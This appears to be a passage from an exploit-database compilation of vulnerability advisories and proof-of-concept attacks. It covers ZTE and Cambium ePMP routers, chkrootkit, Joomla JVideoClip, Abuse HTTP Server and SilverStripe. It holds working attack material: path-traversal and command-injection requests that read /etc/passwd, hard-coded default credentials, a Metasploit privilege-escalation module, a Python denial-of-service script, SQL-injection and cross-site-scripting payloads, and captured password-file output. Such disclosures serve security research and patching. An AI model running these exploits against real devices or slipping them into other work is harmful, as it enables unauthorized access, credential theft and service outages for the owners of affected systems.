enUS,en;q=0.5 AcceptEncoding: gzip, deflate Referer: https://IP/cgibin/webproc Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin Connection: keepalive ContentType: application/xwwwformurlencoded ContentLength: 177 getpage=html%2Findex.html&errorpage=%2fetc%2fpasswd&var%3Amenu=setup&var%3Apage=wancfg&obj action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a HTTP Response HTTP/1.0 200 OK Contenttype: text/html Pragma: nocache CacheControl: nocache setcookie: sessionid=7ce7bd4a; expires=Fri, 31Dec9999 23:59:59 GMT;path=/ #root:x:0:0:root:/root:/bin/bash root:x:0:0:root:/root:/bin/sh #tw:x:504:504::/home/tw:/bin/bash #tw:x:504:504::/home/tw:/bin/msh *CWE-798* <http://cwe.mitre.org/data/definitions/798.html>*: Use of Hard-coded Credentials* - CVE-2015-7251 In the ZXHN H108N R1A, the Telnet service, when enabled, is accessible using the hard-coded credentials 'root' for both the username and password. *CWE-79* <https://cwe.mitre.org/data/definitions/79.html>*: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') *- CVE-2015-7252 In the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is vulnerable to reflected cross-site scripting [pre-authentication]. PoC POST /cgibin/webproc HTTP/1.1 Host: IP UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 AcceptLanguage: enUS,en;q=0.5 AcceptEncoding: gzip, deflate Referer: https://IP/cgibin/webproc Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin Connection: keepalive ContentType: application/xwwwformurlencoded ContentLength: 177 getpage=html%2Findex.html&*errorpage*=html%2fmain.html<script>alert(1)</script>&var%3Amenu=setup&var%3Apage=wancfg&obj action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a +++++ -- Best Regards, Karn Ganeshen
-
# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities] # Discovered by: Karn Ganeshen # Vendor Homepage: [www.zte.com.cn] # Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57] *CVE-ID*: CVE-2015-7257 CVE-2015-7258 CVE-2015-7259 *Note*: Large deployment size, primarily in Peru, used by TdP. 1 *Insufficient authorization controls* *CVE-ID*: CVE-2015-7257 Observed in Password Change functionality. Other functions may be vulnerable as well. *Expected behavior:* Only administrative 'admin' user should be able to change password for all the device users. 'support' is a diagnostic user with restricted privileges. It can change only its own password. *Vulnerability:* Any non-admin user can change 'admin' password. *Steps to reproduce:* a. Login as user 'support' password XXX b. Access Password Change page - http://<IP>/password.htm c. Submit request d. Intercept and Tamper the parameter username change from 'support' to 'admin' e. Enter the new password > old password is not requested > Submit > Login as admin -> Pwn! 2 *Sensitive information disclosure - clear-text passwords* *CVE-ID*: CVE-2015-7258 Displaying user information over Telnet connection, shows all valid users and their passwords in clear-text. *Steps to reproduce:* $ telnet <IP> Trying <IP>... Connected to <IP>. Escape character is '^]'. User Access Verification Username: admin Password: < admin/XXX1 $sh ADSL#login show <-- shows user information Username Password Priority admin password1 2 support password2 0 admin password3 1 3 *(Potential) Backdoor account feature - **insecure account management* *CVE-ID*: CVE-2015-7259 Same login account can exist on the device, multiple times, each with different priority#. It is possible to log in to device with either of the username/password combination. It is considered as a (redundant) login support *feature*. *Steps to reproduce:* $ telnet <IP> Trying <IP>... Connected to <IP>. Escape character is '^]'. User Access Verification User Access Verification Username: admin Password: <-- admin/password3 $sh ADSL#login show Username Password Priority admin password1 2 support password2 0 admin password3 1 +++++ -- Best Regards, Karn Ganeshen
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class Metasploit4 < Msf::Exploit::Local # This could also be Excellent, but since it requires # up to one day to pop a shell, let's set it to Manual instead. Rank = ManualRanking include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Chkrootkit Local Privilege Escalation', 'Description' => %q{ Chkrootkit before 0.50 will run any executable file named /tmp/update as root, allowing a trivial privsec. WfsDelay is set to 24h, since this is how often a chkrootkit scan is scheduled by default. }, 'Author' => [ 'Thomas Stangner', # Original exploit 'Julien "jvoisin" Voisin' # Metasploit module ], 'References' => [ ['CVE', '2014-0476'], ['OSVDB', '107710'], ['EDB', '33899'], ['BID', '67813'], ['CWE', '20'], ['URL', 'http://seclists.org/oss-sec/2014/q2/430'] ], 'DisclosureDate' => 'Jun 04 2014', 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'SessionTypes' => ['shell', 'meterpreter'], 'Privileged' => true, 'Stance' => Msf::Exploit::Stance::Passive, 'Targets' => [['Automatic', {}]], 'DefaultTarget' => 0, 'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h )) register_options([ OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit']) ]) end def check version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1") if version =~ /chkrootkit version 0\.[1-4]/ Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit print_warning('Rooting depends on the crontab (this could take a while)') write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n") cmd_exec('chmod +x /tmp/update') register_file_for_cleanup('/tmp/update') print_status('Payload written to /tmp/update') print_status('Waiting for chkrootkit to run via cron...') end end
-
*July 14, 2015: *First contacted Cambium *July 14, 2015: *Initial vendor response *July 16, 2015: *Vuln Details reported to Cambium *July 31, 2015:* Followup on advisory and fix timelines *August 03, 2015: *Vendor gives mid-Aug as fix (v2.5) release timeline. Ceases communication. *Nov 19, 2015: *Releasing vulnerability details & poc *Versions affected*: < v2.5 ..... *CVE-IDs* - To be assigned. ..... *Background * http://www.cambiumnetworks.com/products/access/epmp-1000/ ePMP™ 1000 Wireless service providers and enterprises need reliable, high-quality broadband connectivity that can be rapidly deployed and expanded. The ePMP platform provides stable coverage across large service areas and enhances your existing infrastructure. *Deployed by:* ION Telecom Kayse Wireless Vanilla Telecom Traeger Park EszakNet Edera Videon COMeSER Seattle, WA Budapest Video Surveillance Desktop Silo Wireless Rocket Broadband Snavely Forest Products KRK Sistemi KAJA Komputer Root Media *Vulnerability Details* *From Cambium Networks ePMP 1000 user / configuration guide: * ePMP 1000 has four (4) users - - ADMINISTRATOR, who has full read and write permissions. - INSTALLER, who has permissions to read and write parameters applicable to unit installation and monitoring. - HOME, who has permissions only to access pertinent information for support purposes - READONLY, who only has permissions to view the Monitor page. ..... 1. *OS Command Injection * 'admin' and 'installer' users have access to perform Ping and Traceroute functions via GUI. No other user has this access. Ping function accepts destination IP address value via 'ping_ip parameter and uses three (3) other parameters - packets_num, buf_size and ttl, to perform Ping. Traceroute function accepts destination IP address via 'traceroute_ip' parameter. The application does not perform strict input validation for all these parameters - ping_ip', packets_num, buf_size and ttl for Ping function; and traceroute_ip for Traceroute function. This allows an authenticated user - 'admin' or non-admin, low-privileged 'installer' & ‘home’ users - to be able to inject arbitrary system commands that gets executed by the host. ..... *PING PoC * ..... HTTP Request ..... POST /cgi-bin/luci/;stok=<stok_value>/admin/ping HTTP/1.1 Host: <IP_address> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://<IP_address>/ Cookie: sysauth=<sysauth_value>; globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=<stok_value> DNT: 1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0 [ *or* ping_ip=8.8.8.8&packets_num=1|cat%20/etc/passwd%20||&buf_size=1&ttl=1&debug=0 *or* ping_ip=8.8.8.8&packets_num=1&buf_size=1|cat%20/etc/passwd%20||&ttl=1&debug=0 *or* ping_ip=8.8.8.8&packets_num=1&buf_size=1&ttl=1|cat%20/etc/passwd%20||&debug=0 ] ..... HTTP Response ..... HTTP/1.1 200 OK Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Cache-Control: no-cache Status: 200 OK Content-Type: text/plain Expires: 0 Date: Sun, 18 Jan 1970 14:45:37 GMT Server: Cambium HTTP Server daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false network:*:101:101:network:/var:/bin/false admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish installer:<password_hash>:2000:100:installer:/tmp:/bin/false home:<password_hash>:3000:100:home:/tmp:/bin/false readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false nobody:*:65534:65534:nobody:/var:/bin/false root:<password_hash>:0:0:root:/root:/bin/ash ..... *traceroute - PoC * ..... HTTP Request ..... POST /cgi-bin/luci/;stok=<stok_value>/admin/traceroute HTTP/1.1 Host: <IP_address> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://<IP_address>/ Cookie: sysauth=<sysauth_value>; globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=<stok_value> DNT: 1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache traceroute_ip=8.8.8.8|cat%20/etc/passwd%20||&fragm=0&trace_method=icmp_echo&display_ttl=0&verbose=0&debug=0 ..... HTTP Response ..... HTTP/1.1 200 OK Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Cache-Control: no-cache Status: 200 OK Content-Type: text/plain Expires: 0 Date: Sun, 18 Jan 1970 16:09:26 GMT Server: Cambium HTTP Server daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false network:*:101:101:network:/var:/bin/false admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish installer:<password_hash>:2000:100:installer:/tmp:/bin/false home:<password_hash>:3000:100:home:/tmp:/bin/false readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false nobody:*:65534:65534:nobody:/var:/bin/false root:<password_hash>:0:0:root:/root:/bin/ash ..... 2. *Weak Authorization Controls + privilege escalation* 'home' and 'readonly' users do not have access to Ping and Traceroute functions via management portal. However, the application lacks strict authorization controls, and we can still perform both these functions by sending corresponding HTTP(S) requests directly, when logged in as low-privileged, 'home' user. When we combine this flaw with above described OS Command Injection affecting ping and traceroute, it is possible for non-admin, low-privileged, ‘home’ user to execute system level commands via 'ping' and 'traceroute' functions and dump password hashes easily and / or perform any system level functions. *Note*: ‘readonly’ user cannot perform this. Only ‘home’ user can exploit these. ..... *Steps to attack - * a login as home user b craft & send HTTP request for ping and traceroute functions ..... Login - HTTP Request .. POST /cgi-bin/luci HTTP/1.1 Host: <IP_address> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://<IP_address>/ Cookie: sysauth=<sysauth_value>; globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D DNT: 1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache username=home&password=<password> ..... Login - HTTP Response .. HTTP/1.1 200 OK Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Cache-Control: no-cache Status: 200 OK Set-Cookie: sysauth=<home-sysauth_value>; path=/cgi-bin/luci/;stok=<home-stok-value> Content-Type: application/json Expires: 0 Date: Sun, 18 Jan 1970 16:40:50 GMT Server: Cambium HTTP Server { "stok": <home-stok_value>", "certif_dir": "/tmp/new_certificates/", "status_url": "/cgi-bin/luci/;stok=<home-stok_value>/admin/status } .. *Sending HTTP request for Ping function * ..... HTTP Request ..... POST /cgi-bin/luci/;stok=<home-stok_value>/admin/ping HTTP/1.1 Host: <IP_address> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://<IP_address>/ Cookie: sysauth=<home-sysauth_value>; globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Home User; usernameType=home; stok=<home-stok_value> DNT: 1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0 ..... HTTP Response ..... HTTP/1.1 200 OK Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Cache-Control: no-cache Status: 200 OK Content-Type: text/plain Expires: 0 Date: Sun, 18 Jan 1970 14:45:37 GMT Server: Cambium HTTP Server daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false network:*:101:101:network:/var:/bin/false admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish installer:<password_hash>:2000:100:installer:/tmp:/bin/false home:<password_hash>:3000:100:home:/tmp:/bin/false readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false nobody:*:65534:65534:nobody:/var:/bin/false root:<password_hash>:0:0:root:/root:/bin/ash .. Similarly, Traceroute function can be exploited. ...................................................................................................................................................... 3. *Weak Authorization Controls + Information Disclosure* In addition to 'admin', only 'installer' user has the option to access device configuration. ‘home’ user does not have GUI option and should not be able to access / download device configuration. However, the application lacks strict authorization measures and the low-privileged 'home' user can gain unauthorized access to the device configuration simply by requesting it. *Configuration backup export* can be performed by directly accessing the following url: *http://<IP_address>/cgi-bin/luci/;stok=<homeuser-stok_value>/admin/config_export?opts=json * Upon a successful config export, full device configuration with clear-text passwords, usernames, keys, IP addresses, statistics, logs etc is downloaded. HTTP/1.1 200 OK Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Cache-Control: no-cache Status: 200 OK Content-Type: application/json Content-Disposition: attachment; filename=<filename>.json Expires: 0 Date: Sun, 18 Jan 1970 16:50:21 GMT Server: Cambium HTTP Server { "template_props": { "templateName":"", "templateDescription":"", "device_type":"", … <output - snipped> … } ..... Best Regards, Karn Ganeshen -- Best Regards, Karn Ganeshen
-
source: https://www.securityfocus.com/bid/62610/info The JVideoClip component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. JVideoClip 1.5.1 is vulnerable; other versions may also be affected. http://www.example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6
-
source: https://www.securityfocus.com/bid/62647/info Blue Coat ProxySG and Security Gateway OS are prone to a denial-of-service vulnerability. Successful exploits may allow an attacker to consume excessive resources, denying service to legitimate users. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/thc-ssl-dos-1.4.tar.gz
-
''' source: https://www.securityfocus.com/bid/62723/info Abuse HTTP Server is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause denial-of-service conditions. Abuse HTTP Server version 2.08 is vulnerable; other versions may also be affected. ''' #!/usr/bin/python import socket import os import sys crash = "0" * 504 buffer="GET / HTTP/1.1\r\n" buffer+="Host: " + crash + "\r\n" buffer+="Content-Type: application/x-www-form-urlencoded\r\n" buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n" buffer+="Content-Length : 1048580\r\n\r\n" print "[*] Exploit c0ded by Zee Eichel - zee[at]cr0security.com" print "[*] Change some option in code with your self" print "[*] Connect to host and send payload" expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) expl.connect(("192.168.1.101", 80)) expl.send(buffer) print "[*] Server Disconected" expl.close()
-
source: https://www.securityfocus.com/bid/62782/info SilverStripe is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible. SilverStripe 3.0.5 is vulnerable; other versions may also be affected. Proof of Concept: ================= 1.1 The first persistent input validation web vulnerability can be exploited by remote attackers with low privileged application user accounts and low required user interaction. For demonstration or reproduce ... PoC: Groups & Rollen (Roles) - Print <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>SilverStripe - Sicherheit</title> <link rel="stylesheet" type="text/css" href="/framework/css/GridField_print.css?m=1346228458"> </head> <body onload="window.print();"> <h3>SilverStripe - Sicherheit</h3> <table> <thead> <tr><th>Vorname</th><th>Nachname</th><th>E-Mail</th></tr> </thead> <tbody> </tbody> </table> <p> Gedruckt am 11:44pm, 22/09/2013 <br> Gedruckt von a%20>"<iframe src="a" onload="alert("BKM")<" a%20="" a%20<="">>"<iframe src=a onload=alert("BKM")< </p> </body> </html> </iframe></p></body></html> POST http://www.example.com/admin/security/EditForm/field/Groups/item/new/ItemEditForm Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content Size[20] Mime Type[text/html] Request Headers: Host[www.example.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] Accept[*/*] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Pjax[CurrentForm,Breadcrumbs] X-Requested-With[XMLHttpRequest] Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/new] Content-Length[336] Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; __utmb=1.8.10.1379847695; __utmc=1; __utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-ModelAdmin=false; __utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1; __utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); cms-panel-collapsed-cms-content-tools-AssetAdmin=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false] Connection[keep-alive] Pragma[no-cache] Cache-Control[no-cache] Post Data: Title[a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert(%22BKM%22)%3C++++a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert(%22BKM%22)%3C] ParentID[] ID[] SecurityID[1d6ca7e871bd6ec855f9409e25e030359c5b435f] action_doSave[1] BackURL[http%3A%2F%2Fwww.example.com%2Fadmin%2Fsecurity%2FEditForm%2Ffield%2FGroups%2Fitem%2Fnew%2F] Response Headers: Server[nginx] Date[Sun, 22 Sep 2013 11:44:20 GMT] Content-Type[text/html; charset=utf-8] Connection[keep-alive] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-cache, max-age=0, must-revalidate] Pragma[no-cache] Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:20 GMT; path=/; httponly] X-ControllerURL[admin/security/EditForm/field/Groups/item/4] X-Pjax[CurrentForm,Breadcrumbs] X-Controller[SecurityAdmin] X-Title[SilverStripe - Sicherheit] X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1& plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen %2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js? m=1379847630,/framework/admin/javascript/SecurityAdmin.js?m=1346228457,/framework/javascript/PermissionCheckboxSetField.js?m=1346228484] X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m=1346228458,/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css? m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css?m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css? m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458,/framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[20] Status: 200[OK] GET http://www.example.com/admin/security/EditForm/field/Groups/item/4 Load Flags[LOAD_BACKGROUND ] Content Size[3966] Mime Type[text/html] Request Headers: Host[www.example.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] Accept[*/*] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] X-Pjax[CurrentForm,Breadcrumbs] X-Requested-With[XMLHttpRequest] Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4] Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; __utmb=1.8.10.1379847695; __utmc=1; __utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-ModelAdmin=false; __utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1; __utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd= organic|utmctr=(not%20provided); cms-panel-collapsed-cms-content-tools-AssetAdmin=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false] Connection[keep-alive] Response Headers: Server[nginx] Date[Sun, 22 Sep 2013 11:44:21 GMT] Content-Type[text/html; charset=utf-8] Connection[keep-alive] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-cache, max-age=0, must-revalidate] Pragma[no-cache] Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:21 GMT; path=/; httponly] X-Controller[SecurityAdmin] X-Title[SilverStripe - Sicherheit] X-Include-JS[/assets/_combinedfiles/lib.js?m=1379847629,/framework/thirdparty/tinymce/tiny_mce_gzip.php?m=1346228525&js=1& plugins=contextmenu%2Ctable%2Cemotions%2Cpaste%2Cspellchecker%2Cmedia%2Cfullscreen %2Cinlinepopups&themes=advanced&languages=de&diskcache=true&src=false,/assets/_combinedfiles/leftandmain.js? m=1379847630,/framework/admin/javascript/SecurityAdmin.js?m=1346228457,/framework/javascript/PermissionCheckboxSetField.js?m=1346228484] X-Include-CSS[/framework/admin/thirdparty/jquery-notice/jquery.notice.css?m= 1346228458,/framework/thirdparty/jquery-ui-themes/smoothness/jquery-ui.css?m=1346228525,/framework/admin/thirdparty/chosen/chosen/chosen.css? m=1346228457,/framework/thirdparty/jstree/themes/apple/style.css?m=1346228525,/framework/css/TreeDropdownField.css?m=1346228458, /framework/admin/css/screen.css?m=1346228456,/framework/css/GridField.css?m=1346228458,/framework/css/CheckboxSetField.css?m=1346228458] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[3966] Status: 200[OK] GET http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/ field/Members?Title=a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload%3Dalert (%22BKM%22)%3C++++a%252&ParentID=&gridfield_relationsearch=&Members%5B GridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2C%22 GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22currentPage%22%3A1%7D%2C%22 GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmail %5D=&ID=4&SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken <== Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[378] Mime Type[text/html] Request Headers: Host[www.example.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4] Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; __utmb=1.8.10.1379847695; __utmc=1; __utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; cms-panel- collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-ModelAdmin=false; __utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1; __utmz=1.1379847854.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); cms-panel-collapsed-cms-content-tools-AssetAdmin=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false] Connection[keep-alive] Response Headers: Server[nginx] Date[Sun, 22 Sep 2013 11:44:26 GMT] Content-Type[text/html; charset=utf-8] Connection[keep-alive] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-cache, max-age=0, must-revalidate] Pragma[no-cache] Set-Cookie[PastMember=1; expires=Sat, 21-Dec-2013 11:44:26 GMT; path=/; httponly] X-Controller[SecurityAdmin] X-Title[SilverStripe - Sicherheit] Vary[Accept-Encoding] Content-Encoding[gzip] Content-Length[378] Status: 200[OK] GET http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/[PERSISTENT INJECTED SCRIPT CODE AS PATH!] Load Flags[LOAD_DOCUMENT_URI ] Content Size[20] Mime Type[text/html] Request Headers: Host[www.example.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[en-US,en;q=0.5] Accept-Encoding[gzip, deflate] DNT[1] Referer[http://www.example.com/admin/security/EditForm/field/Groups/item/4/ItemEditForm/field/ Members?Title=a%2520%3C%2F%3E%3E%22%3Ciframe+src%3Da+onload %3Dalert(%22BKM%22)%3C++++a%252&ParentID=&gridfield_relationsearch=&Members%5B GridState%5D=%7B%22GridFieldAddRelation%22%3A%5B%5D%2C%22GridFieldSortableHeader%22%3A%7B%22SortColumn%22%3A%5B%5D%7D%2C%22 GridFieldFilterHeader%22%3A%7B%22Columns%22%3A%5B%5D%7D%2C%22GridFieldPaginator%22%3A%7B%22currentPage%22%3A1%7D%2C%22 GridFieldSearchRelation%22%3A%5B%5D%7D&filter%5BFirstName%5D=&filter%5BSurname%5D=&filter%5BEmai%5D=&ID=4& SecurityID=1d6ca7e871bd6ec855f9409e25e030359c5b435f&action_gridFieldAlterAction%3FStateID%3D523ed8157c4b68_95954854=Drucken] Cookie[__utma=1.1338660565.1379847695.1379847695.1379847695.1; __utmb=1.8.10.1379847695; __utmc=1; __utmz=1.1379847695.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); PHPSESSID=3cdf3fce42b710fc8e1da69d18cc0dc4; PastMember=1; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-ModelAdmin=false; __utma=1.1551299670.1379847854.1379847854.1379847854.1; __utmc=1; __utmz=1.1379847854.1.1.utmcsr=google| utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); cms-panel-collapsed-cms-content-tools-AssetAdmin=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; cms-panel-collapsed-cms-content-tools-CMSPageHistoryController=false] Connection[keep-alive] Response Headers: Server[nginx] Date[Sun, 22 Sep 2013 11:44:27 GMT] Content-Type[text/html; charset=utf-8] Connection[keep-alive] Expires[Thu, 19 Nov 1981 08:52:00 GMT] Cache-Control[no-cache, max-age=0, must-revalidate] Pragma[no-cache] Set-Cookie[PastMember=1; expires=Sat, 